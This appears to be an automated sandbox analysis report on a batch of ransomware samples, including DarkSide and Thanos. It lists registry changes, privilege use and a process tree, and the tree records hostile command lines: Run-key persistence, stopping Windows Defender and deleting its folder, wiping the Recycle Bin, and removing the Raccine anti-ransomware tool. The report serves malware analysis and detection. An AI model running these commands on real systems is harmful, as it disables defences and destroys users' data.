9a49469326b18d27e83a8215b614233855355c2c71137223a79bf0b59acde47a heur-trojan-ransom.win32.darkside.gen-b565e9266717161163e884793dc1004f9f2ca94ab0533df9c167d5d188cebf2f.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\RestartManager\Session0000\SessionHash = a53ee2d526a4d2b40cdda9485ae480b604721c84a27296337536654a98636252 heur-trojan-ransom.win32.darkside.gen-b565e9266717161163e884793dc1004f9f2ca94ab0533df9c167d5d188cebf2f.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\RestartManager\Session0000\SessionHash = 86c696c37e9b5528a9baf96abde8bfa02641c1c8ffbdc060d3cb789e5b66c874 heur-trojan-ransom.win32.darkside.gen-b565e9266717161163e884793dc1004f9f2ca94ab0533df9c167d5d188cebf2f.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\RestartManager\Session0000 heur-trojan-ransom.win32.darkside.gen-b565e9266717161163e884793dc1004f9f2ca94ab0533df9c167d5d188cebf2f.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft heur-trojan-ransom.win32.darkside.gen-b565e9266717161163e884793dc1004f9f2ca94ab0533df9c167d5d188cebf2f.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\RestartManager\Session0000\Owner = 240700003ebe317ad01cdb01 heur-trojan-ransom.win32.darkside.gen-b565e9266717161163e884793dc1004f9f2ca94ab0533df9c167d5d188cebf2f.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\RestartManager\Session0000\SessionHash = 56b7e865001adcabebe06cad02cd84273b929afbec782dd3beabcb1eabfc32af heur-trojan-ransom.win32.darkside.gen-b565e9266717161163e884793dc1004f9f2ca94ab0533df9c167d5d188cebf2f.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\RestartManager\Session0000\RegFilesHash = dcc4a79767d33abed44bcb5077687cb8f2edd95e106dceb6e3a86c1900752dda heur-trojan-ransom.win32.darkside.gen-b565e9266717161163e884793dc1004f9f2ca94ab0533df9c167d5d188cebf2f.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\RestartManager\Session0000\SessionHash = 93b35de87d1761e5a1f6bb317c33885efe2596b374d5f186adfc5d4c87ea2ebd heur-trojan-ransom.win32.darkside.gen-b565e9266717161163e884793dc1004f9f2ca94ab0533df9c167d5d188cebf2f.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\RestartManager\Session0000\RegFilesHash = a8eb048eda4ae294451345aa9124ab33a8e220528a69f4d30849b96440ba5676 heur-trojan-ransom.win32.darkside.gen-b565e9266717161163e884793dc1004f9f2ca94ab0533df9c167d5d188cebf2f.exe -
Modifies registry class 5 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\c2944f1d\DefaultIcon heur-trojan-ransom.win32.darkside.gen-b565e9266717161163e884793dc1004f9f2ca94ab0533df9c167d5d188cebf2f.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\c2944f1d heur-trojan-ransom.win32.darkside.gen-b565e9266717161163e884793dc1004f9f2ca94ab0533df9c167d5d188cebf2f.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\c2944f1d\DefaultIcon\ = "C:\\ProgramData\\c2944f1d.ico" heur-trojan-ransom.win32.darkside.gen-b565e9266717161163e884793dc1004f9f2ca94ab0533df9c167d5d188cebf2f.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.c2944f1d heur-trojan-ransom.win32.darkside.gen-b565e9266717161163e884793dc1004f9f2ca94ab0533df9c167d5d188cebf2f.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.c2944f1d\ = "c2944f1d" heur-trojan-ransom.win32.darkside.gen-b565e9266717161163e884793dc1004f9f2ca94ab0533df9c167d5d188cebf2f.exe -
Modifies registry key 1 TTPs 3 IoCs
pid Process 5736 reg.exe 3596 REG.exe 5296 reg.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1620 schtasks.exe 5848 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3896 taskmgr.exe 3896 taskmgr.exe 3896 taskmgr.exe 3896 taskmgr.exe 3896 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3116 powershell.exe 3116 powershell.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 1736 7zFM.exe 3468 taskmgr.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeRestorePrivilege 1736 7zFM.exe Token: 35 1736 7zFM.exe Token: SeSecurityPrivilege 1736 7zFM.exe Token: SeDebugPrivilege 3896 taskmgr.exe Token: SeSystemProfilePrivilege 3896 taskmgr.exe Token: SeCreateGlobalPrivilege 3896 taskmgr.exe Token: SeDebugPrivilege 3468 taskmgr.exe Token: SeSystemProfilePrivilege 3468 taskmgr.exe Token: SeCreateGlobalPrivilege 3468 taskmgr.exe Token: 33 3896 taskmgr.exe Token: SeIncBasePriorityPrivilege 3896 taskmgr.exe Token: SeDebugPrivilege 3116 powershell.exe Token: SeDebugPrivilege 1132 HEUR-Trojan-Ransom.MSIL.Blocker.gen-1c0edaf81b38ce528d2720863e8316306875941eae58da12f963c20ef9276b30.exe Token: SeDebugPrivilege 4792 HEUR-Trojan-Ransom.MSIL.Blocker.gen-36355464c361c0e2caa14c517de97291a9bc6707acda3bbd34a30aa45e55c5b2.exe Token: SeDebugPrivilege 392 HEUR-Trojan-Ransom.MSIL.Blocker.gen-06207f1f13af1dbbc3de612d1e031437f9f5aefbfdb989d68f52a193405cb160.exe Token: SeDebugPrivilege 4080 HEUR-Trojan-Ransom.MSIL.Blocker.gen-da4b4dd47271515cd6569e478a8a64369d5b60be78a7ff89bd885fcd98464349.exe Token: SeBackupPrivilege 1916 vssvc.exe Token: SeRestorePrivilege 1916 vssvc.exe Token: SeAuditPrivilege 1916 vssvc.exe Token: SeDebugPrivilege 3932 HEUR-Trojan-Ransom.MSIL.Thanos.gen-4852f22df095db43f2a92e99384ff7667020413e74f67fcbd42fca16f8f96f4c.exe Token: SeIncreaseQuotaPrivilege 5464 WMIC.exe Token: SeSecurityPrivilege 5464 WMIC.exe Token: SeTakeOwnershipPrivilege 5464 WMIC.exe Token: SeLoadDriverPrivilege 5464 WMIC.exe Token: SeSystemProfilePrivilege 5464 WMIC.exe Token: SeSystemtimePrivilege 5464 WMIC.exe Token: SeProfSingleProcessPrivilege 5464 WMIC.exe Token: SeIncBasePriorityPrivilege 5464 WMIC.exe Token: SeCreatePagefilePrivilege 5464 WMIC.exe Token: SeBackupPrivilege 5464 WMIC.exe Token: SeRestorePrivilege 5464 WMIC.exe Token: SeShutdownPrivilege 5464 WMIC.exe Token: SeDebugPrivilege 5464 WMIC.exe Token: SeSystemEnvironmentPrivilege 5464 WMIC.exe Token: SeRemoteShutdownPrivilege 5464 WMIC.exe Token: SeUndockPrivilege 5464 WMIC.exe Token: SeManageVolumePrivilege 5464 WMIC.exe Token: 33 5464 WMIC.exe Token: 34 5464 WMIC.exe Token: 35 5464 WMIC.exe Token: 36 5464 WMIC.exe Token: SeIncreaseQuotaPrivilege 5476 WMIC.exe Token: SeSecurityPrivilege 5476 WMIC.exe Token: SeTakeOwnershipPrivilege 5476 WMIC.exe Token: SeLoadDriverPrivilege 5476 WMIC.exe Token: SeSystemProfilePrivilege 5476 WMIC.exe Token: SeSystemtimePrivilege 5476 WMIC.exe Token: SeProfSingleProcessPrivilege 5476 WMIC.exe Token: SeIncBasePriorityPrivilege 5476 WMIC.exe Token: SeCreatePagefilePrivilege 5476 WMIC.exe Token: SeBackupPrivilege 5476 WMIC.exe Token: SeRestorePrivilege 5476 WMIC.exe Token: SeShutdownPrivilege 5476 WMIC.exe Token: SeDebugPrivilege 5476 WMIC.exe Token: SeSystemEnvironmentPrivilege 5476 WMIC.exe Token: SeRemoteShutdownPrivilege 5476 WMIC.exe Token: SeUndockPrivilege 5476 WMIC.exe Token: SeManageVolumePrivilege 5476 WMIC.exe Token: 33 5476 WMIC.exe Token: 34 5476 WMIC.exe Token: 35 5476 WMIC.exe Token: 36 5476 WMIC.exe Token: SeDebugPrivilege 5328 taskkill.exe Token: SeIncreaseQuotaPrivilege 5560 WMIC.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 1736 7zFM.exe 1736 7zFM.exe 3896 taskmgr.exe 3896 taskmgr.exe 3896 taskmgr.exe 3896 taskmgr.exe 3896 taskmgr.exe 3896 taskmgr.exe 3896 taskmgr.exe 3896 taskmgr.exe 3896 taskmgr.exe 3896 taskmgr.exe 3896 taskmgr.exe 3896 taskmgr.exe 3896 taskmgr.exe 3896 taskmgr.exe 3896 taskmgr.exe 3896 taskmgr.exe 3896 taskmgr.exe 3896 taskmgr.exe 3896 taskmgr.exe 3896 taskmgr.exe 3896 taskmgr.exe 3896 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3896 taskmgr.exe 3468 taskmgr.exe 3896 taskmgr.exe 3468 taskmgr.exe 3896 taskmgr.exe 3468 taskmgr.exe 3896 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3896 taskmgr.exe 3468 taskmgr.exe 3896 taskmgr.exe 3468 taskmgr.exe 3896 taskmgr.exe 3468 taskmgr.exe 3896 taskmgr.exe 3468 taskmgr.exe 3896 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 3896 taskmgr.exe 3896 taskmgr.exe 3896 taskmgr.exe 3896 taskmgr.exe 3896 taskmgr.exe 3896 taskmgr.exe 3896 taskmgr.exe 3896 taskmgr.exe 3896 taskmgr.exe 3896 taskmgr.exe 3896 taskmgr.exe 3896 taskmgr.exe 3896 taskmgr.exe 3896 taskmgr.exe 3896 taskmgr.exe 3896 taskmgr.exe 3896 taskmgr.exe 3896 taskmgr.exe 3896 taskmgr.exe 3896 taskmgr.exe 3896 taskmgr.exe 3896 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3896 taskmgr.exe 3468 taskmgr.exe 3896 taskmgr.exe 3468 taskmgr.exe 3896 taskmgr.exe 3468 taskmgr.exe 3896 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3896 taskmgr.exe 3468 taskmgr.exe 3896 taskmgr.exe 3468 taskmgr.exe 3896 taskmgr.exe 3468 taskmgr.exe 3896 taskmgr.exe 3468 taskmgr.exe 3896 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe 3468 taskmgr.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3896 wrote to memory of 3468 3896 taskmgr.exe 89 PID 3896 wrote to memory of 3468 3896 taskmgr.exe 89 PID 3116 wrote to memory of 2580 3116 powershell.exe 97 PID 3116 wrote to memory of 2580 3116 powershell.exe 97 PID 2580 wrote to memory of 4164 2580 cmd.exe 98 PID 2580 wrote to memory of 4164 2580 cmd.exe 98 PID 2580 wrote to memory of 4164 2580 cmd.exe 98 PID 2580 wrote to memory of 392 2580 cmd.exe 99 PID 2580 wrote to memory of 392 2580 cmd.exe 99 PID 2580 wrote to memory of 392 2580 cmd.exe 99 PID 2580 wrote to memory of 1132 2580 cmd.exe 100 PID 2580 wrote to memory of 1132 2580 cmd.exe 100 PID 2580 wrote to memory of 1132 2580 cmd.exe 100 PID 2580 wrote to memory of 4792 2580 cmd.exe 101 PID 2580 wrote to memory of 4792 2580 cmd.exe 101 PID 2580 wrote to memory of 4792 2580 cmd.exe 101 PID 2580 wrote to memory of 5116 2580 cmd.exe 102 PID 2580 wrote to memory of 5116 2580 cmd.exe 102 PID 2580 wrote to memory of 5116 2580 cmd.exe 102 PID 2580 wrote to memory of 4624 2580 cmd.exe 103 PID 2580 wrote to memory of 4624 2580 cmd.exe 103 PID 2580 wrote to memory of 4624 2580 cmd.exe 103 PID 2580 wrote to memory of 1412 2580 cmd.exe 106 PID 2580 wrote to memory of 1412 2580 cmd.exe 106 PID 2580 wrote to memory of 1412 2580 cmd.exe 106 PID 2580 wrote to memory of 4080 2580 cmd.exe 108 PID 2580 wrote to memory of 4080 2580 cmd.exe 108 PID 2580 wrote to memory of 3924 2580 cmd.exe 109 PID 2580 wrote to memory of 3924 2580 cmd.exe 109 PID 2580 wrote to memory of 3924 2580 cmd.exe 109 PID 2580 wrote to memory of 1080 2580 cmd.exe 110 PID 2580 wrote to memory of 1080 2580 cmd.exe 110 PID 2580 wrote to memory of 3932 2580 cmd.exe 111 PID 2580 wrote to memory of 3932 2580 cmd.exe 111 PID 2580 wrote to memory of 3932 2580 cmd.exe 111 PID 2580 wrote to memory of 4812 2580 cmd.exe 112 PID 2580 wrote to memory of 4812 2580 cmd.exe 112 PID 2580 wrote to memory of 4812 2580 cmd.exe 112 PID 2580 wrote to memory of 4956 2580 cmd.exe 113 PID 2580 wrote to memory of 4956 2580 cmd.exe 113 PID 2580 wrote to memory of 4956 2580 cmd.exe 113 PID 2580 wrote to memory of 1808 2580 cmd.exe 114 PID 2580 wrote to memory of 1808 2580 cmd.exe 114 PID 2580 wrote to memory of 5096 2580 cmd.exe 115 PID 2580 wrote to memory of 5096 2580 cmd.exe 115 PID 2580 wrote to memory of 5096 2580 cmd.exe 115 PID 2580 wrote to memory of 4644 2580 cmd.exe 116 PID 2580 wrote to memory of 4644 2580 cmd.exe 116 PID 2580 wrote to memory of 4644 2580 cmd.exe 116 PID 2580 wrote to memory of 4620 2580 cmd.exe 117 PID 2580 wrote to memory of 4620 2580 cmd.exe 117 PID 2580 wrote to memory of 4620 2580 cmd.exe 117 PID 2580 wrote to memory of 3296 2580 cmd.exe 180 PID 2580 wrote to memory of 3296 2580 cmd.exe 180 PID 2580 wrote to memory of 3296 2580 cmd.exe 180 PID 2580 wrote to memory of 5056 2580 cmd.exe 121 PID 2580 wrote to memory of 5056 2580 cmd.exe 121 PID 2580 wrote to memory of 5056 2580 cmd.exe 121 PID 1544 wrote to memory of 4512 1544 heur-trojan-ransom.win32.darkside.gen-b565e9266717161163e884793dc1004f9f2ca94ab0533df9c167d5d188cebf2f.exe 132 PID 1544 wrote to memory of 4512 1544 heur-trojan-ransom.win32.darkside.gen-b565e9266717161163e884793dc1004f9f2ca94ab0533df9c167d5d188cebf2f.exe 132 PID 1544 wrote to memory of 4512 1544 heur-trojan-ransom.win32.darkside.gen-b565e9266717161163e884793dc1004f9f2ca94ab0533df9c167d5d188cebf2f.exe 132 PID 1544 wrote to memory of 4512 1544 heur-trojan-ransom.win32.darkside.gen-b565e9266717161163e884793dc1004f9f2ca94ab0533df9c167d5d188cebf2f.exe 132 PID 2580 wrote to memory of 832 2580 cmd.exe 125 PID 2580 wrote to memory of 832 2580 cmd.exe 125 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00450.7z"1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1736
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3896 -
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /12⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3468
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3116 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:2580 -
C:\Users\Admin\Desktop\00450\HEUR-Trojan-Ransom.MSIL.Agent.gen-7431f66d89ea92fb18a3fb489b71417672d15e6140e66062912c38138b2a8c55.exeHEUR-Trojan-Ransom.MSIL.Agent.gen-7431f66d89ea92fb18a3fb489b71417672d15e6140e66062912c38138b2a8c55.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4164
-
-
C:\Users\Admin\Desktop\00450\HEUR-Trojan-Ransom.MSIL.Blocker.gen-06207f1f13af1dbbc3de612d1e031437f9f5aefbfdb989d68f52a193405cb160.exeHEUR-Trojan-Ransom.MSIL.Blocker.gen-06207f1f13af1dbbc3de612d1e031437f9f5aefbfdb989d68f52a193405cb160.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:392 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "RFQ" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\RFQ.exe"4⤵PID:5464
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "RFQ" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\RFQ.exe"5⤵PID:6000
-
-
-
C:\Users\Admin\AppData\Roaming\RFQ.exe"C:\Users\Admin\AppData\Roaming\RFQ.exe"4⤵PID:8168
-
-
-
C:\Users\Admin\Desktop\00450\HEUR-Trojan-Ransom.MSIL.Blocker.gen-1c0edaf81b38ce528d2720863e8316306875941eae58da12f963c20ef9276b30.exeHEUR-Trojan-Ransom.MSIL.Blocker.gen-1c0edaf81b38ce528d2720863e8316306875941eae58da12f963c20ef9276b30.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1132
-
-
C:\Users\Admin\Desktop\00450\HEUR-Trojan-Ransom.MSIL.Blocker.gen-36355464c361c0e2caa14c517de97291a9bc6707acda3bbd34a30aa45e55c5b2.exeHEUR-Trojan-Ransom.MSIL.Blocker.gen-36355464c361c0e2caa14c517de97291a9bc6707acda3bbd34a30aa45e55c5b2.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4792 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "RFQ" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\RFQ.exe"4⤵PID:4324
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "RFQ" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\RFQ.exe"5⤵PID:6080
-
-
-
C:\Users\Admin\AppData\Roaming\RFQ.exe"C:\Users\Admin\AppData\Roaming\RFQ.exe"4⤵PID:448
-
C:\Users\Admin\AppData\Roaming\RFQ.exe"C:\Users\Admin\AppData\Roaming\RFQ.exe"5⤵PID:2676
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2676 -s 1846⤵
- Program crash
PID:10184
-
-
-
-
-
C:\Users\Admin\Desktop\00450\HEUR-Trojan-Ransom.MSIL.Blocker.gen-3faaf8a467e00d500ef4345a6676b14d71c687cbb43eec700ec3dbc2fcbaa266.exeHEUR-Trojan-Ransom.MSIL.Blocker.gen-3faaf8a467e00d500ef4345a6676b14d71c687cbb43eec700ec3dbc2fcbaa266.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5116 -
C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan-Ransom.MSIL.Blocker.gen-3faaf8a467e00d500ef4345a6676b14d71c687cbb43eec700ec3dbc2fcbaa266.exeC:\Users\Admin\AppData\Local\Temp\HEUR-Trojan-Ransom.MSIL.Blocker.gen-3faaf8a467e00d500ef4345a6676b14d71c687cbb43eec700ec3dbc2fcbaa266.exe4⤵PID:5544
-
C:\Users\Admin\AppData\Local\systemaltan.exe"C:\Users\Admin\AppData\Local\systemaltan.exe"5⤵PID:7156
-
-
-
-
C:\Users\Admin\Desktop\00450\HEUR-Trojan-Ransom.MSIL.Blocker.gen-5a4aab0cd8f0b345d8c07ff690a7b038ed23d6bd5587360e0c17c22d9bf0f70f.exeHEUR-Trojan-Ransom.MSIL.Blocker.gen-5a4aab0cd8f0b345d8c07ff690a7b038ed23d6bd5587360e0c17c22d9bf0f70f.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4624 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4624 -s 11364⤵
- Program crash
PID:804
-
-
-
C:\Users\Admin\Desktop\00450\HEUR-Trojan-Ransom.MSIL.Blocker.gen-78f124b7a00d29a4573c261f1ef8be979ce46c347371365ba820ba5750422f88.exeHEUR-Trojan-Ransom.MSIL.Blocker.gen-78f124b7a00d29a4573c261f1ef8be979ce46c347371365ba820ba5750422f88.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:1412 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵PID:3300
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵PID:6584
-
-
-
C:\Users\Admin\Desktop\00450\HEUR-Trojan-Ransom.MSIL.Blocker.gen-da4b4dd47271515cd6569e478a8a64369d5b60be78a7ff89bd885fcd98464349.exeHEUR-Trojan-Ransom.MSIL.Blocker.gen-da4b4dd47271515cd6569e478a8a64369d5b60be78a7ff89bd885fcd98464349.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4080
-
-
C:\Users\Admin\Desktop\00450\HEUR-Trojan-Ransom.MSIL.Blocker.gen-dbc9ca213f978c5cd8574d52088a9edfa09432fd760adb7736fc6bf04e531c82.exeHEUR-Trojan-Ransom.MSIL.Blocker.gen-dbc9ca213f978c5cd8574d52088a9edfa09432fd760adb7736fc6bf04e531c82.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3924 -
C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe" /EXEFilename "C:\Windows\System32\sc.exe" /WindowState 0 /CommandLine "stop WinDefend" /StartDirectory "" /RunAs 8 /Run4⤵
- Access Token Manipulation: Create Process with Token
PID:5512 -
C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe" /SpecialRun 4101d8 55125⤵PID:6952
-
-
-
C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe" /EXEFilename "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /WindowState 0 /CommandLine "rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse" /StartDirectory "" /RunAs 8 /Run4⤵
- Access Token Manipulation: Create Process with Token
PID:6772 -
C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe" /SpecialRun 4101d8 67725⤵PID:10028
-
-
-
C:\Users\Admin\AppData\Local\Temp\MSBuild.exeC:\Users\Admin\AppData\Local\Temp\MSBuild.exe4⤵PID:6420
-
-
-
C:\Users\Admin\Desktop\00450\HEUR-Trojan-Ransom.MSIL.Foreign.gen-ae25edc0d1d6f7e83eee6a9a28a80c1a6833405459a7ea98bf7ce1c1ada86843.exeHEUR-Trojan-Ransom.MSIL.Foreign.gen-ae25edc0d1d6f7e83eee6a9a28a80c1a6833405459a7ea98bf7ce1c1ada86843.exe3⤵
- Executes dropped EXE
PID:1080 -
C:\ProgramData\MediaPlayer\irvrmjavhica.exe"C:\ProgramData\MediaPlayer\irvrmjavhica.exe"4⤵PID:5636
-
-
-
C:\Users\Admin\Desktop\00450\HEUR-Trojan-Ransom.MSIL.Thanos.gen-4852f22df095db43f2a92e99384ff7667020413e74f67fcbd42fca16f8f96f4c.exeHEUR-Trojan-Ransom.MSIL.Thanos.gen-4852f22df095db43f2a92e99384ff7667020413e74f67fcbd42fca16f8f96f4c.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3932 -
C:\Windows\SysWOW64\taskkill.exe"taskkill" /F /IM RaccineSettings.exe4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5328
-
-
C:\Windows\SysWOW64\reg.exe"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F4⤵PID:5704
-
-
C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe"C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe" 3468 HEUR-Trojan-Ransom.MSIL.Thanos.gen-4852f22df095db43f2a92e99384ff7667020413e74f67fcbd42fca16f8f96f4c.exe4⤵PID:5968
-
-
C:\Windows\SysWOW64\reg.exe"reg" delete HKCU\Software\Raccine /F4⤵
- Modifies registry key
PID:5296
-
-
C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe"C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe" 3468 HEUR-Trojan-Ransom.MSIL.Thanos.gen-4852f22df095db43f2a92e99384ff7667020413e74f67fcbd42fca16f8f96f4c.exe *324⤵PID:5204
-
-
C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe"C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe" 3468 conhost.exe4⤵PID:5336
-
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /DELETE /TN "Raccine Rules Updater" /F4⤵PID:2424
-
-
C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe"C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe" 3468 net.exe4⤵PID:5724
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:3296
-
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config Dnscache start= auto4⤵
- Launches sc.exe
PID:5428
-
-
C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe"C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe" 3468 net1.exe4⤵PID:5824
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config FDResPub start= auto4⤵
- Launches sc.exe
PID:5424
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SSDPSRV start= auto4⤵
- Launches sc.exe
PID:2864
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin4⤵PID:5652
-
-
C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe"C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe" 3468 ARP.EXE4⤵PID:5340
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config upnphost start= auto4⤵
- Launches sc.exe
